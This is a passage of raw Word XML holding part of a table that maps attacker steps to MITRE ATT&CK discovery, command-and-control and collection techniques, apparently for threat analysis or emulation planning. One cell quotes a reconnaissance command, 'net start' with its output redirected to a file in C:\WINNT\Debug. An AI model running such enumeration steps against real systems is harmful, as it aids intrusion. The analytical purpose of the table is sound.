          <w:p w14:paraId="4B61BB7E" w14:textId="45430FB9" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1049 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F62A49D" w14:textId="36A87C46" w:rsidR="00674213" w:rsidRDefault="00592C17" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="458DB7CB" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54EDE0B7" w14:textId="1B8054CF"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0652250F" w14:textId="005B9849" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1864540B" w14:textId="5FBA8D9E" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00674213" w:rsidRPr="00B857D7" w14:paraId="06F07624" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54DD4C44" w14:textId="133438A2" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00316A64">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48C3ACCC" w14:textId="42CB03B6" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="009025D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15C8F969" w14:textId="08C2A0EF" w:rsidR="00674213" w:rsidRPr="003E52D1" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00713E7E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A14E8D1" w14:textId="3A348C8B" w:rsidR="00674213" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42255E5D" w14:textId="77777777" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67CCEE22" w14:textId="2542419F"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6F347230" w14:textId="6BCE6386" w:rsidR="00674213" w:rsidRPr="00B857D7" w:rsidRDefault="00674213" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0D9A97" w14:textId="69126A44" w:rsidR="00674213" w:rsidRDefault="00316A64" w:rsidP="00674213">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w14:paraId="0397D17E" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51AD777C" w14:textId="0F7C7BAF" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BF4FDA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06CDB248" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C3D2CA8" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Network Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E6DADB" w14:textId="669FEFBE" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4066FBBE" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49D48F59" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8C35AD" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FF420B6" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="00CA0DE3" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">From </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>net start&gt;</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>&gt;”C:\WINNT\Debug\1.txt</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CA0DE3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006B545B" w:rsidRPr="003E52D1" w14:paraId="6BB79D15" w14:textId="77777777" w:rsidTr="00674213">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8275F3" w14:textId="13BE7277" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BF4FDA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F3BB00" w14:textId="594CDDD5" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4659D307" w14:textId="6104D5E6" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.00</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: </w:t>
            </w:r>
            <w:r w:rsidRPr="00E64EE0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Application Layer Protocol: Mail Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F01A02F" w14:textId="16E8F85A" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00592C17">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C6B39CF" w14:textId="77777777" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AED9332" w14:textId="79DC41FB" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3895BB74" w14:textId="30F17A4C" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6345115A" w14:textId="04DB7189" w:rsidR="006B545B" w:rsidRPr="003E52D1" w:rsidRDefault="006B545B" w:rsidP="006B545B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Pass info back</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004046A1" w:rsidRPr="004046A1" w14:paraId="60EAEF47" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44AA484A" w14:textId="2A316C9D" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="00BF4FDA" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53A426A8" w14:textId="32B8B0C3" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004046A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004046A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0009  Collection</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B6BEAD3" w14:textId="3BEBD3C7" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004046A1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004046A1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1119 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004046A1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Automated Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="561C7ACA" w14:textId="5C350095" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="608" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D9F84EE" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBB675F" w14:textId="43CF670A" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="00592C17" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7950E0" w14:textId="77777777" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C205F0A" w14:textId="0C06F774" w:rsidR="004046A1" w:rsidRPr="004046A1" w:rsidRDefault="004046A1" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004046A1">
              <w:t xml:space="preserve">[1] Completing </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004046A1">
              <w:t>The</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004046A1">
              <w:t xml:space="preserve"> Mission. Collect files of interest</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004046A1" w:rsidRPr="003E52D1" w14:paraId="04D6B56A" w14:textId="77777777" w:rsidTr="00DD2D38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B95C67D" w14:textId="0A04CA8A" w:rsidR="004046A1" w:rsidRDefault="00BF4FDA" w:rsidP="00DD2D38">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
